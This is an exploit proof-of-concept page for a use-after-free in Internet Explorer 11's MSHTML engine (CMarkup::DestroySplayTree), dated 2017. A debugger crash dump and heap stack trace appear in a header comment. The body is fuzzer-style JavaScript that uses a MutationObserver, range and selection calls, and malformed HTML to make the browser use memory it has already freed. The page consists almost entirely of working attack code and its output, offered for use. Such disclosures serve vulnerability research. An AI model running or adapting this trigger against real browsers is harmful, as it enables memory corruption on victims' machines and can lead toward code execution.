Microsoft Internet Explorer 111 CMarkup::DestroySplayTree Use-After-Free

`<!DOCTYPE html>  
<html>  
<head>  
<meta http-equiv="content-type" content="text/html; charset=UTF-8">  
<meta http-equiv="Expires" content="0" />  
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />  
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />  
<meta http-equiv="Pragma" content="no-cache" />  
<style type="text/css">  
body{  
background-color:black;  
font-color:red;  
};  
</style>  
  
<script type='text/javascript'></script>   
<script type="text/javascript" language="JavaScript">  
  
/********************************  
* Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free  
* Google Dork: n/a  
* Date: 03.05.2017  
* Exploit Author: Marcin Ressel   
* TT: @r_esselm  
* Vendor Homepage: www.microsoft.com  
* Software Link: n/a  
* Version: 11.0.9600.18638  
* Tested on: Windows 7  
* CVE : n/a  
* ****************************  
(151c.10a4): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0  
eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:  
706af750 ff36 push dword ptr [esi] ds:002b:1195cfa0=????????  
0:007> !heap -p -a @esi  
address 1195cfa0 found in  
_DPH_HEAP_ROOT @ 9f61000  
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)  
ef4230c: 1195c000 2000  
743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2  
76f9170c ntdll!RtlDebugFreeHeap+0x0000002f  
76f4a863 ntdll!RtlpFreeHeap+0x0000005d  
76ef2bd5 ntdll!RtlFreeHeap+0x00000142  
769c14ad kernel32!HeapFree+0x00000014  
707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046  
6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223  
7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3  
702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2  
702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058  
700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180  
700c5484 MSHTML!CFrameSite::Passivate+0x00000024  
6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1  
6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a  
705517cb MSHTML!CBase::JSBind_Release+0x00000050  
6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023  
6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e  
6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9  
6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a  
6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072  
6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb  
6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e  
6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac  
6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055  
6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a  
6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120  
709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b  
7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3  
706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9  
7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6  
70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8  
7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93  
*   
*/   
  
var ref = [];  
var doc = null;  
var dom = null;  
var trg = null;  
var trg_parent = null;  
var text_r = null;  
var select_o = null;  
  
function handle() {  
  
try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}  
try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}  
try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}  
try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}  
try{select_o.selectAllChildren(ref[1], 0);}catch(e){}  
try{text_r.select();}catch(e){}  
try{tree_r.setEnd(ref[0],0);}catch(e){}  
try{select_o.selectAllChildren(doc.body);}catch(e){}  
try{tree_r.surroundContents(ref[0]);}catch(e){}  
try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}  
try{tree_r.selectNodeContents(document.body);}catch(e){}  
try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}  
  
}  
  
  
function testcase() {  
  
var e1f = document.getElementById("e1");  
doc = document.getElementById("t1").contentWindow.document;   
  
e = e1f.contentWindow.document.createElement("ins");   
e.cite = 'about:blank';  
rf = doc.body.appendChild(e);   
ref.push(rf);   
e = e1f.contentWindow.document.createElement("iframe");  
rf = doc.body.appendChild(e);   
ref.push(rf);   
  
dom = doc.getElementsByTagName("*");   
trg = dom[3];   
trg_parent = doc.body;  
text_r = doc.body.createTextRange();   
tree_r = doc.createRange();   
tree_r.setStart(trg,0);   
tree_r.setEnd(trg,0);  
select_o = window.getSelection();   
  
var ob = new MutationObserver(handle);  
ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true });   
  
try {   
trg.insertBefore(document.createElement("div"),ref[1]);   
} catch(e) {}  
  
doc.adoptNode(trg.attributes[0]);  
trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "&Agrave;";  
tmp = trg;  
}  
  
</script>  
<title>IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>  
</head>  
<body onload='testcase();'>  
<iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>  
</body>  
</html>  
  
`